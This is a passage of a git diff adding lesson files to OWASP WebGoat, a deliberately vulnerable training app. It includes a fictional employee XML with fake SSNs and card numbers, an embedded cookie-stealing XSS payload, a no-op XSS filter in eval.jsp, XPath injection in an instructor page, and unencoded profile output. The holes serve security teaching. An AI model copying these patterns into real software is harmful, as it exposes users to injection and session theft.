+			<Manager>112</Manager>
+		</Managers> 
+    </Employee>
+    <Employee>
+        <UserID>103</UserID>
+        <FirstName>Curly</FirstName>
+        <LastName>Stooge</LastName>
+        <Street>1112 Crusoe Lane</Street>
+        <CS>New York, NY</CS>
+        <Phone>410-667-6654</Phone>
+        <StartDate>2122001</StartDate>
+        <SSN>961-08-0047</SSN>
+        <Salary>50000</Salary>
+        <CreditCard>NA</CreditCard>
+        <Limit>0</Limit>
+        <Comments>Owes three-thousand to company for fradulent purchases</Comments>
+        <DisciplinaryExplanation>Hit Moe back</DisciplinaryExplanation>
+        <DisciplinaryDate>101014</DisciplinaryDate>
+        <Managers>
+            <Manager>102</Manager>
+            <Manager>111</Manager>
+            <Manager>112</Manager>
+        </Managers>  
+    </Employee>
+    <Employee>
+        <UserID>104</UserID>
+        <FirstName>Eric</FirstName>
+        <LastName>Walker</LastName>
+        <Street>1160 Prescott Rd</Street>
+        <CS>New York, NY</CS>
+        <Phone>410-887-1193</Phone>
+        <StartDate>12152005</StartDate>
+        <SSN>445-66-5565</SSN>
+        <Salary>13000</Salary>
+        <CreditCard>NA</CreditCard>
+        <Limit>0</Limit>
+        <Comments>Late. Always needs help. Too intern-ish.</Comments>
+        <DisciplinaryExplanation>Bothering Larry about webgoat problems</DisciplinaryExplanation>
+        <DisciplinaryDate>101013</DisciplinaryDate>
+        <Managers>
+            <Manager>107</Manager>
+            <Manager>102</Manager>
+            <Manager>111</Manager>
+            <Manager>112</Manager>
+        </Managers> 
+    </Employee>
+    <Employee>
+        <UserID>105</UserID>
+        <FirstName>Tom</FirstName>
+        <LastName>Cat</LastName>
+        <Street>2211 HyperThread Rd.</Street>
+        <CS>New York, NY</CS>
+        <Phone>443-599-0762</Phone>
+        <StartDate>1011999</StartDate>
+        <SSN>792-14-6364</SSN>
+        <Salary>80000</Salary>
+        <CreditCard>5481360857968521</CreditCard>
+        <Limit>30000</Limit>
+        <Comments>Co-Owner.</Comments>
+        <DisciplinaryExplanation>NA</DisciplinaryExplanation>
+        <DisciplinaryDate>0</DisciplinaryDate>
+        <Managers>
+            <Manager>106</Manager>
+            <Manager>102</Manager>
+            <Manager>111</Manager>
+            <Manager>112</Manager>
+        </Managers> 
+    </Employee>
+    <Employee>
+        <UserID>106</UserID>
+        <FirstName>Jerry</FirstName>
+        <LastName>Mouse</LastName>
+        <Street>3011 Unix Drive</Street>
+        <CS>New York, NY</CS>
+        <Phone>443-699-3366</Phone>
+        <StartDate>1011999</StartDate>
+        <SSN>858-55-4452</SSN>
+        <Salary>70000</Salary>
+        <CreditCard>6981754825013564</CreditCard>
+        <Limit>20000</Limit>
+        <Comments>Co-Owner.</Comments>
+        <DisciplinaryExplanation>NA</DisciplinaryExplanation>
+        <DisciplinaryDate>0</DisciplinaryDate>
+        <Managers>
+            <Manager>102</Manager>
+            <Manager>111</Manager>
+            <Manager>112</Manager>
+        </Managers>  
+    </Employee>
+    <Employee>
+        <UserID>107</UserID>
+        <FirstName>David</FirstName>
+        <LastName>Giambi</LastName>
+        <Street>5132 DIMM Avenue</Street>
+        <CS>New York, NY</CS>
+        <Phone>610-521-8413</Phone>
+        <StartDate>5011999</StartDate>
+        <SSN>439-20-9405</SSN>
+        <Salary>100000</Salary>
+        <CreditCard>6981754825018101</CreditCard>
+        <Limit>10000</Limit>
+        <Comments>Strong work habbit. Questionable ethics.</Comments>
+        <DisciplinaryExplanation>Hacked into accounting server. Modified personal pay.</DisciplinaryExplanation>
+        <DisciplinaryDate>61402</DisciplinaryDate>
+        <Managers>
+            <Manager>102</Manager>
+            <Manager>111</Manager>
+            <Manager>112</Manager>
+        </Managers>         
+    </Employee>
+    <Employee>
+        <UserID>108</UserID>
+        <FirstName>Bruce</FirstName>
+        <LastName>McGuirre</LastName>
+        <Street>8899 FreeBSD Drive&lt;script&gt;alert(document.cookie)&lt;/script&gt; </Street>
+        <CS>New York, NY</CS>
+        <Phone>610-282-1103</Phone>
+        <StartDate>3012000</StartDate>
+        <SSN>707-95-9482</SSN>
+        <Salary>110000</Salary>
+        <CreditCard>6981754825854136</CreditCard>
+        <Limit>30000</Limit>
+        <Comments>Enjoys watching others struggle in exercises.</Comments>
+        <DisciplinaryExplanation>Tortuous Boot Camp workout at 5am. Employees felt sick.</DisciplinaryExplanation>
+        <DisciplinaryDate>61502</DisciplinaryDate>
+        <Managers>
+            <Manager>107</Manager>
+            <Manager>102</Manager>
+            <Manager>111</Manager>
+            <Manager>112</Manager>
+        </Managers>        
+    </Employee>
+    <Employee>
+        <UserID>109</UserID>
+        <FirstName>Sean</FirstName>
+        <LastName>Livingston</LastName>
+        <Street>6422 dFlyBSD Road</Street>
+        <CS>New York, NY</CS>
+        <Phone>610-878-9549</Phone>
+        <StartDate>6012003</StartDate>
+        <SSN>136-55-1046</SSN>
+        <Salary>130000</Salary>
+        <CreditCard>6981754825014510</CreditCard>
+        <Limit>5000</Limit>
+        <Comments>Has some fascination with Steelers. Go Ravens.</Comments>
+        <DisciplinaryExplanation>Late to work 30 days in row due to excessive Halo 2</DisciplinaryExplanation>
+        <DisciplinaryDate>72804</DisciplinaryDate>
+        <Managers>
+            <Manager>107</Manager>
+            <Manager>102</Manager>
+            <Manager>111</Manager>
+            <Manager>112</Manager>
+        </Managers>        
+    </Employee>
+    <Employee>
+        <UserID>110</UserID>
+        <FirstName>Joanne</FirstName>
+        <LastName>McDougal</LastName>
+        <Street>5567 Broadband Lane</Street>
+        <CS>New York, NY</CS>
+        <Phone>610-213-6341</Phone>
+        <StartDate>1012001</StartDate>
+        <SSN>789-54-2413</SSN>
+        <Salary>90000</Salary>
+        <CreditCard>6981754825081054</CreditCard>
+        <Limit>300</Limit>
+        <Comments>Finds it necessary to leave early every day.</Comments>
+        <DisciplinaryExplanation>Used company cc to purchase new car. Limit adjusted.</DisciplinaryExplanation>
+        <DisciplinaryDate>112005</DisciplinaryDate>
+        <Managers>
+            <Manager>106</Manager>
+            <Manager>102</Manager>
+            <Manager>111</Manager>
+            <Manager>112</Manager>
+        </Managers> 
+    </Employee>
+    <Employee>
+        <UserID>111</UserID>
+        <FirstName>John</FirstName>
+        <LastName>Wayne</LastName>
+        <Street>129 Third St</Street>
+        <CS>New York, NY</CS>
+        <Phone>610-213-1134</Phone>
+        <StartDate>1012001</StartDate>
+        <SSN>129-69-4572</SSN>
+        <Salary>200000</Salary>
+        <CreditCard>4437334565679921</CreditCard>
+        <Limit>300</Limit>
+        <Comments></Comments>
+        <DisciplinaryExplanation></DisciplinaryExplanation>
+        <DisciplinaryDate>112005</DisciplinaryDate>
+        <Managers>
+            <Manager>112</Manager>
+        </Managers>   
+    </Employee>
+    <Employee>
+        <UserID>112</UserID>
+        <FirstName>Neville</FirstName>
+        <LastName>Bartholomew</LastName>
+        <Street>1 Corporate Headquarters</Street>
+        <CS>San Jose, CA</CS>
+        <Phone>408-587-0024</Phone>
+        <StartDate>3012000</StartDate>
+        <SSN>111-111-1111</SSN>
+        <Salary>450000</Salary>
+        <CreditCard>4803389267684109</CreditCard>
+        <Limit>300</Limit>
+        <Comments></Comments>
+        <DisciplinaryExplanation></DisciplinaryExplanation>
+        <DisciplinaryDate>112005</DisciplinaryDate>        
+    </Employee>
+</Employees>
diff --git a/main/project/WebContent/lessons/Ajax/eval.jsp b/main/project/WebContent/lessons/Ajax/eval.jsp
new file mode 100644
index 000000000..d0c083ab3
--- /dev/null
+++ b/main/project/WebContent/lessons/Ajax/eval.jsp
@@ -0,0 +1,37 @@
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1" import="java.util.regex.*" import="org.owasp.webgoat.lessons.DangerousEval"
+    pageEncoding="ISO-8859-1"%>
+<%
+String action = request.getParameter("action");
+String field1 = request.getParameter("field1");
+String field2 = request.getParameter("field2");
+String regex1 = "^[0-9]{3}$";// any three digits
+Pattern pattern1 = Pattern.compile(regex1);
+
+if(action == null) action = "Purchase";
+if(field1 == null) field1 = "123";
+if(field2 == null) field2 = "-1";
+
+/** For security reasons, we remove all '<' and '>' characters to prevent XSS **/
+field1.replaceAll("<", "");
+field1.replaceAll(">", "");
+field2.replaceAll("<", "");
+field2.replaceAll(">", "");
+
+if("Purchase".equals(action))
+{
+	if(!pattern1.matcher(field1).matches())
+	{
+		/** If they supplied the right attack, pass them **/
+		if(field1.indexOf("');") != -1 && field1.indexOf("alert") != -1 && field1.indexOf("document.cookie") != -1)
+		{
+			session.setAttribute(DangerousEval.PASSED, "true");
+		}
+		
+		out.write("alert('Whoops: You entered an incorrect access code of \"" + field1 + "\"');");
+	}
+	else
+	{
+		out.write("alert('Purchase completed successfully with credit card \"" + field2 + "\" and access code \"" + field1 + "\"');");
+	}
+}
+%>
diff --git a/main/project/WebContent/lessons/Ajax/images/lesson1_header.jpg b/main/project/WebContent/lessons/Ajax/images/lesson1_header.jpg
new file mode 100644
index 000000000..60a809af0
Binary files /dev/null and b/main/project/WebContent/lessons/Ajax/images/lesson1_header.jpg differ
diff --git a/main/project/WebContent/lessons/Ajax/images/lesson1_workspace.jpg b/main/project/WebContent/lessons/Ajax/images/lesson1_workspace.jpg
new file mode 100644
index 000000000..292d25654
Binary files /dev/null and b/main/project/WebContent/lessons/Ajax/images/lesson1_workspace.jpg differ
diff --git a/main/project/WebContent/lessons/Ajax/instructor/clientSideFiltering_i.jsp b/main/project/WebContent/lessons/Ajax/instructor/clientSideFiltering_i.jsp
new file mode 100644
index 000000000..e6217ecb6
--- /dev/null
+++ b/main/project/WebContent/lessons/Ajax/instructor/clientSideFiltering_i.jsp
@@ -0,0 +1,111 @@
+
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+    pageEncoding="ISO-8859-1"%>
+    
+<%@ page import="java.io.*, javax.xml.xpath.*, org.xml.sax.InputSource,org.w3c.dom.*,org.apache.ecs.html.* " %>  
+    
+<% 
+
+String userId = request.getParameter("userId");
+
+
+	NodeList nodes = null;
+	
+	
+
+	File d = new File(this.getServletContext().getRealPath("lessons/Ajax/employees.xml"));
+	
+	if(d.exists()){
+		System.out.print("File does exist");
+	}
+	else{
+		System.out.print("File DOES NOT exist");
+	}
+	
+	System.out.println(d.getAbsolutePath());
+	XPathFactory factory = XPathFactory.newInstance();
+	XPath xPath = factory.newXPath();
+	InputSource inputSource = new InputSource(new FileInputStream(d));
+
+
+	StringBuffer sb = new StringBuffer();
+	
+	sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/UserID | ");
+	sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/FirstName | ");
+	sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/LastName | ");
+	sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/SSN | ");
+	sb.append("/Employees/Employee [Managers/Manager/text()='" + userId + "']/Salary ");
+	
+	String expression = sb.toString();
+	
+	System.out.print("expression:" + expression);
+
+
+
+
+
+	nodes = (NodeList) xPath.evaluate(expression, inputSource,
+	XPathConstants.NODESET);
+	int nodesLength = nodes.getLength();
+
+	
+	System.out.println("nodesLength:" + nodesLength);
+
+	TR tr;
+	
+	int COLUMNS = 5;
+	
+	Table t2 = null;
+    if (nodesLength > 0)
+    {
+		t2 = new Table().setCellSpacing(0).setCellPadding(0).setBorder(
+			1).setWidth("90%").setAlign("center");
+		tr = new TR();	
+		tr.addElement(new TD().addElement("UserID"));
+		tr.addElement(new TD().addElement("First Name"));
+		tr.addElement(new TD().addElement("Last Name"));
+		tr.addElement(new TD().addElement("SSN"));
+		tr.addElement(new TD().addElement("Salary"));
+		t2.addElement(tr);
+    }
+    
+
+    
+    tr = new TR();
+    
+    for (int i = 0; i < nodesLength; i++)
+    {
+		Node node = nodes.item(i);
+		
+		if(i%COLUMNS==0){
+			tr = new TR();
+			tr.setID(node.getTextContent());
+			//tr.setStyle("display: none");
+		}
+		
+		tr.addElement(new TD().addElement(node.getTextContent()));
+		
+		if(i%COLUMNS==(COLUMNS-1)){
+			t2.addElement(tr);		
+		}
+    }
+    
+    if(t2 != null){
+   	 	out.println(t2.toString());
+    }
+    else{
+    	out.println("No Results");
+    }
+    
+    
+
+    
+	
+	
+	
+	
+	
+
+
+%>
+    
diff --git a/main/project/WebContent/lessons/Ajax/sameOrigin.jsp b/main/project/WebContent/lessons/Ajax/sameOrigin.jsp
new file mode 100644
index 000000000..26e652898
--- /dev/null
+++ b/main/project/WebContent/lessons/Ajax/sameOrigin.jsp
@@ -0,0 +1 @@
+Good Response
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/ConfManagement/config.jsp b/main/project/WebContent/lessons/ConfManagement/config.jsp
new file mode 100644
index 000000000..7abe1430f
--- /dev/null
+++ b/main/project/WebContent/lessons/ConfManagement/config.jsp
@@ -0,0 +1,19 @@
+<%@ page language="java" contentType="text/html; charset=ISO-8859-1"
+    pageEncoding="ISO-8859-1"%>
+<%@page import="org.owasp.webgoat.session.WebSession"%>
+<%
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+%>
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Configuration Page</title>
+</head>
+<body>
+<% response.sendRedirect(webSession.getCurrentLesson().getLink() +
+		        "&succeeded=yes"); 
+%>
+
+</body>
+</html>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/CrossSiteScripting/CrossSiteScripting.css b/main/project/WebContent/lessons/CrossSiteScripting/CrossSiteScripting.css
new file mode 100644
index 000000000..fad6880ad
--- /dev/null
+++ b/main/project/WebContent/lessons/CrossSiteScripting/CrossSiteScripting.css
@@ -0,0 +1,14 @@
+#lesson_wrapper {height: 435px;width: 500px;}
+#lesson_header {background-image: url(lessons/CrossSiteScripting/images/lesson1_header.jpg);width: 490px;padding-right: 10px;padding-top: 60px;background-repeat: no-repeat;}
+.lesson_workspace {background-image: url(lessons/CrossSiteScripting/images/lesson1_workspace.jpg);width: 489px;height: 325px;padding-left: 10px;padding-top: 10px;background-repeat: no-repeat;}
+.lesson_text {height: 240px;width: 460px;padding-top: 5px;}
+#lesson_buttons_bottom {height: 20px;width: 460px;}
+#lesson_b_b_left {width: 300px;float: left;}
+#lesson_b_b_right input {width: 100px;float: right;}
+.lesson_title_box {height: 20px;width: 420px;padding-left: 30px;}
+.lesson_workspace { }
+.lesson_txt_10 {font-family: Arial, Helvetica, sans-serif;font-size: 10px;}
+.lesson_text_db {color: #0066FF}
+#lesson_login {background-image: url(lessons/CrossSiteScripting/images/lesson1_loginWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
+#lesson_login_txt {font-family: Arial, Helvetica, sans-serif;font-size: 12px;text-align: center;}
+#lesson_search {background-image: url(lessons/CrossSiteScripting/images/lesson1_SearchWindow.jpg);height: 124px;width: 311px;background-repeat: no-repeat;padding-top: 30px;margin-left: 80px;margin-top: 50px;text-align: center;}
diff --git a/main/project/WebContent/lessons/CrossSiteScripting/CrossSiteScripting.jsp b/main/project/WebContent/lessons/CrossSiteScripting/CrossSiteScripting.jsp
new file mode 100644
index 000000000..a571c370c
--- /dev/null
+++ b/main/project/WebContent/lessons/CrossSiteScripting/CrossSiteScripting.jsp
@@ -0,0 +1,26 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting" 
+	errorPage="" %>
+<style>
+<jsp:include page="CrossSiteScripting.css" />
+</style>
+<%
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+CrossSiteScripting currentLesson = (CrossSiteScripting) webSession.getCurrentLesson();
+%>
+<div id="lesson_wrapper">
+	<div id="lesson_header"></div>
+	<div class="lesson_workspace">
+	<%
+	String subViewPage = currentLesson.getPage(webSession);
+	if (subViewPage != null)
+	{
+		//System.out.println("Including sub view page: " + subViewPage);
+	%>
+	<jsp:include page="<%=subViewPage%>" />
+	<%
+	}
+	%>
+
+	</div>
+</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/CrossSiteScripting/EditProfile.jsp b/main/project/WebContent/lessons/CrossSiteScripting/EditProfile.jsp
new file mode 100644
index 000000000..13952f612
--- /dev/null
+++ b/main/project/WebContent/lessons/CrossSiteScripting/EditProfile.jsp
@@ -0,0 +1,134 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting" 
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	Employee employee = (Employee) session.getAttribute("CrossSiteScripting.Employee");
+%>
+		<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span></div>
+		<div class="lesson_text">
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+				<Table>
+				<TR><TD>
+						First Name:
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=CrossSiteScripting.FIRST_NAME%>" type="text" value="<%=employee.getFirstName()%>"/>
+					</TD>
+					<TD>				
+						Last Name:
+					</TD>
+					<TD>
+					 	<input class="lesson_text_db" name="<%=CrossSiteScripting.LAST_NAME%>" type="text" value="<%=employee.getLastName()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>				
+						Street: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=CrossSiteScripting.ADDRESS1%>" type="text" value="<%=employee.getAddress1()%>"/>
+					</TD>
+					<TD>				
+						City/State: 
+					<TD>
+						<input class="lesson_text_db" name="<%=CrossSiteScripting.ADDRESS2%>" type="text" value="<%=employee.getAddress2()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Phone: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=CrossSiteScripting.PHONE_NUMBER%>" type="text" value="<%=employee.getPhoneNumber()%>"/>
+					</TD>
+					<TD>				
+						Start Date: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=CrossSiteScripting.START_DATE%>" type="text" value="<%=employee.getStartDate()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+			    		SSN: 
+			    	</TD>
+			    	<TD>
+			    		<input class="lesson_text_db" name="<%=CrossSiteScripting.SSN%>" type="text" value="<%=employee.getSsn()%>"/> 
+					</TD>
+					<TD>				
+						Salary: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=CrossSiteScripting.SALARY%>" type="text" value="<%=employee.getSalary()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Credit Card: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=CrossSiteScripting.CCN%>" type="text" value="<%=employee.getCcn()%>"/>
+					</TD>
+					<TD>				
+						Credit Card Limit: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=CrossSiteScripting.CCN_LIMIT%>" type="text" value="<%=employee.getCcnLimit()%>"/>
+					</TD>
+				</TR>
+				<TR><TD>
+						Comments: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=CrossSiteScripting.DESCRIPTION%>" type="text" value="<%=employee.getPersonalDescription()%>"/>
+					</TD>
+					<TD>				
+						Manager: 
+					</TD>
+					<TD>
+						<select class="lesson_text_db" name="<%=CrossSiteScripting.MANAGER%>">
+						<%
+				      	List employees = (List) session.getAttribute("CrossSiteScripting.Staff");
+				      	Iterator i = employees.iterator();
+						while (i.hasNext())
+						{
+							EmployeeStub stub = (EmployeeStub) i.next();
+								%>
+								<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()%></option>
+						<%}%>
+						</select>
+					</TD>	
+				</TR>
+				<TR><TD>
+						Disciplinary Explanation: 
+					</TD>
+					<TD>
+						<textarea name="<%=CrossSiteScripting.DISCIPLINARY_NOTES%>" cols="16" rows="3" class="lesson_text_db" ><%=employee.getDisciplinaryActionNotes()%></textarea>
+					</TD>
+					<TD>				
+						Disciplinary Action Dates: 
+					</TD>
+					<TD>
+						<input class="lesson_text_db" name="<%=CrossSiteScripting.DISCIPLINARY_DATE%>" type="text" value="<%=employee.getDisciplinaryActionDate()%>"/>
+					</TD>
+				</TR>
+				</Table>
+				<BR>
+				<div class="lesson_buttons_bottom">
+				<table width="460" height="20" border="0" cellpadding="0" cellspacing="0">
+               		<tr>
+                     		<td width="57">
+							<input type="submit" name="action" value="<%=CrossSiteScripting.VIEWPROFILE_ACTION%>"/>
+				  		</td>
+				  		
+                       	<td width="81">
+ 							<input name="<%=CrossSiteScripting.EMPLOYEE_ID%>" type="hidden" value="<%=employee.getId()%>">
+							<input name="<%=CrossSiteScripting.TITLE%>" type="hidden" value="<%=employee.getTitle()%>">
+							<input type="submit" name="action" value="<%=CrossSiteScripting.UPDATEPROFILE_ACTION%>"/>
+						</td>
+                        	<td width="211"></td>
+                        	<td width="83">
+	 						<input type="submit" name="action" value="<%=CrossSiteScripting.LOGOUT_ACTION%>"/>
+						</td>
+                 	</tr>
+              	</table>
+              	</div>
+			</form>
+		</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/CrossSiteScripting/ListStaff.jsp b/main/project/WebContent/lessons/CrossSiteScripting/ListStaff.jsp
new file mode 100644
index 000000000..2a8d07731
--- /dev/null
+++ b/main/project/WebContent/lessons/CrossSiteScripting/ListStaff.jsp
@@ -0,0 +1,54 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting" 
+	errorPage="" %>
+<%
+	WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	int myUserId = webSession.getUserIdInLesson();
+%>
+	<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span> - Staff Listing Page</div>
+		<br>
+		<br>
+		<br>
+		<p>Select from the list below	</p>
+		<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+  <table width="60%" border="0" cellpadding="3">
+    <tr>
+      <td>  <label>
+  <select name="<%=CrossSiteScripting.EMPLOYEE_ID%>" size="11">
+			      	<%
+			      	List employees = (List) session.getAttribute("CrossSiteScripting." + CrossSiteScripting.STAFF_ATTRIBUTE_KEY);
+			      	Iterator i = employees.iterator();
+					while (i.hasNext())
+					{
+						EmployeeStub stub = (EmployeeStub) i.next();%>
+						<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName()+ " (" + stub.getRole() + ")"%></option><%
+					}%>
+  </select>
+  </label></td>
+      <td>
+	        	<input type="submit" name="action" value="<%=CrossSiteScripting.SEARCHSTAFF_ACTION%>"/><br>
+	        	<input type="submit" name="action" value="<%=CrossSiteScripting.VIEWPROFILE_ACTION%>"/><br>
+            		<% 
+				if (webSession.isAuthorizedInLesson(myUserId, CrossSiteScripting.CREATEPROFILE_ACTION))
+				{
+				%>
+					<input type="submit" name="action" value="<%=CrossSiteScripting.CREATEPROFILE_ACTION%>"/><br>
+				<% 
+				}
+				%>
+            		<% 
+				if (webSession.isAuthorizedInLesson(myUserId, CrossSiteScripting.DELETEPROFILE_ACTION))
+				{
+				%>
+					<input type="submit" name="action" value="<%=CrossSiteScripting.DELETEPROFILE_ACTION%>"/><br>
+				<% 
+				}
+				%>
+			<br>
+					<input type="submit" name="action" value="<%=CrossSiteScripting.LOGOUT_ACTION%>"/>
+	  </td>
+    </tr>
+  </table>
+
+		</form>
+		
diff --git a/main/project/WebContent/lessons/CrossSiteScripting/Login.jsp b/main/project/WebContent/lessons/CrossSiteScripting/Login.jsp
new file mode 100644
index 000000000..4479289e9
--- /dev/null
+++ b/main/project/WebContent/lessons/CrossSiteScripting/Login.jsp
@@ -0,0 +1,32 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="java.util.*, org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting" 
+	errorPage="" %>
+	<div id="lesson_login">
+		<div id="lesson_login_txt">
+			<% 
+			WebSession webSession = ((WebSession)session.getAttribute("websession"));
+			%>
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+			    	<label>
+			      	<select name="<%=CrossSiteScripting.EMPLOYEE_ID%>">
+			      	<%
+			      	//System.out.println("Retrieving employees list");
+			      	List employees = (List) session.getAttribute("CrossSiteScripting." + CrossSiteScripting.STAFF_ATTRIBUTE_KEY);
+			      	Iterator i = employees.iterator();
+					while (i.hasNext())
+					{
+						EmployeeStub stub = (EmployeeStub) i.next();
+					%>
+			      	<option value="<%=Integer.toString(stub.getId())%>"><%=stub.getFirstName() + " " + stub.getLastName() + " (" + stub.getRole() + ")"%></option>
+					<%}%>
+	                </select>
+		        </label>
+				<br>
+			    	<label>Password
+			    		<input name="password" type="password" size="10" maxlength="8" />
+			    </label>
+				<br>
+				<input type="submit" name="action" value="<%=CrossSiteScripting.LOGIN_ACTION%>"/>
+			</form>
+		</div>
+	</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/CrossSiteScripting/SearchStaff.jsp b/main/project/WebContent/lessons/CrossSiteScripting/SearchStaff.jsp
new file mode 100644
index 000000000..4e1f6885c
--- /dev/null
+++ b/main/project/WebContent/lessons/CrossSiteScripting/SearchStaff.jsp
@@ -0,0 +1,22 @@
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting" 
+	errorPage="" %>
+	<div id="lesson_search">
+			<% 
+			WebSession webSession = ((WebSession)session.getAttribute("websession"));
+			String searchedName = request.getParameter(CrossSiteScripting.SEARCHNAME);
+			if (searchedName != null)
+			{
+			%>
+				Employee <%=searchedName%> not found.
+			<%
+			}
+			%>
+			<form id="form1" name="form1" method="post" action="<%=webSession.getCurrentLesson().getFormAction()%>">
+			    	<label>Name
+					<input class="lesson_text_db" type="text" name="<%=CrossSiteScripting.SEARCHNAME%>"/>
+		        </label>
+				<br>
+				<input type="submit" name="action" value="<%=CrossSiteScripting.FINDPROFILE_ACTION%>"/>
+			</form>
+	</div>
\ No newline at end of file
diff --git a/main/project/WebContent/lessons/CrossSiteScripting/ViewProfile.jsp b/main/project/WebContent/lessons/CrossSiteScripting/ViewProfile.jsp
new file mode 100644
index 000000000..e9d293a47
--- /dev/null
+++ b/main/project/WebContent/lessons/CrossSiteScripting/ViewProfile.jsp
@@ -0,0 +1,160 @@
+<!--
+STAGE 4 FIXES Look for the <-- STAGE 4 - FIX
+-->
+<%@ page contentType="text/html; charset=ISO-8859-1" language="java" 
+	import="org.owasp.webgoat.session.*, org.owasp.webgoat.lessons.CrossSiteScripting.CrossSiteScripting" errorPage="" %>
+<%
+WebSession webSession = ((WebSession)session.getAttribute("websession"));
+	Employee employee = (Employee) session.getAttribute("CrossSiteScripting." + CrossSiteScripting.EMPLOYEE_ATTRIBUTE_KEY);
+	CrossSiteScripting lesson = (CrossSiteScripting) webSession.getCurrentLesson();
+//	int myUserId = getIntSessionAttribute(webSession, "CrossSiteScripting." + CrossSiteScripting.USER_ID);
+%>
+		<div class="lesson_title_box"><strong>Welcome Back </strong><span class="lesson_text_db"><%=webSession.getUserNameInLesson()%></span></div>
+		<div class="lesson_text">
+				<Table>
+				<TR><TD>
+						First Name:
+					</TD>
+					<TD>
+						<%=employee.getFirstName()%>
+					</TD>
+					<TD>				
+						Last Name:
+					</TD>
+					<TD>
+					 	<%=employee.getLastName()%>
+					</TD>
+				</TR>
+				<TR><TD>				
+						Street: 
+					</TD>
+					<TD>
+						<!-- STAGE 4 - FIX  Note that the description value below gets encoded and address1 here is not -->
+
+						<%=employee.getAddress1()%>
+					</TD>
+					<TD>				
+						City/State: 
+					<TD>
+						<%=employee.getAddress2()%>
+					</TD>
+				</TR>
+				<TR><TD>
+						Phone: 
+					</TD>
+					<TD>
+						<%=employee.getPhoneNumber()%>
+					</TD>
+					<TD>				
+						Start Date: 
+					</TD>
+					<TD>
+						<%=employee.getStartDate()%>
+					</TD>
+				</TR>
+				<TR><TD>
+			    		SSN: 
+			    	</TD>
+			    	<TD>
+			    		<%=employee.getSsn()%>
+					</TD>
+					<TD>				
+						Salary: 
+					</TD>
+					<TD>
+						<%=employee.getSalary()%>
+					</TD>
+				</TR>
+				<TR><TD>
+						Credit Card: 
+					</TD>
+					<TD>
+						<%=employee.getCcn()%>
+					</TD>
+					<TD>				
+						Credit Card Limit: 
+					</TD>
+					<TD>
+						<%=employee.getCcnLimit()%>
+					</TD>
+				</TR>
+				<TR><TD>
+						Comments: 
+					</TD>
+					<TD>
+						<!-- Encode data that might contain HTML content to protect against XSS -->
+
+						<%=lesson.htmlEncode(webSession, employee.getPersonalDescription())%>
+					</TD>
+					<TD>				
+						Manager: 
+					</TD>
+					<TD>
+						<%=employee.getManager()%>
+					</TD>	
+				</TR>
+				<TR><TD>
+						Disciplinary Explanation: 
+					</TD>
+					<TD>
+						<%=employee.getDisciplinaryActionNotes()%>
+					</TD>
+					<TD>				
+						Disciplinary Action Dates: 
+					</TD>
+					<TD>
+						<%=employee.getDisciplinaryActionDate()%>
+					</TD>
+				</TR>
+				</Table>
+		</div>
+		<div class="lesson_buttons_bottom">
+		    <table width="460" height="20" border="0" cellpadding="0" cellspacing="0">
+                 <tr>
+                 	<td width="50">
+					<%					
+					if (webSession.isAuthorizedInLesson(webSession.getUserIdInLesson(), CrossSiteScripting.LISTSTAFF_ACTION))
+					{
+					%>
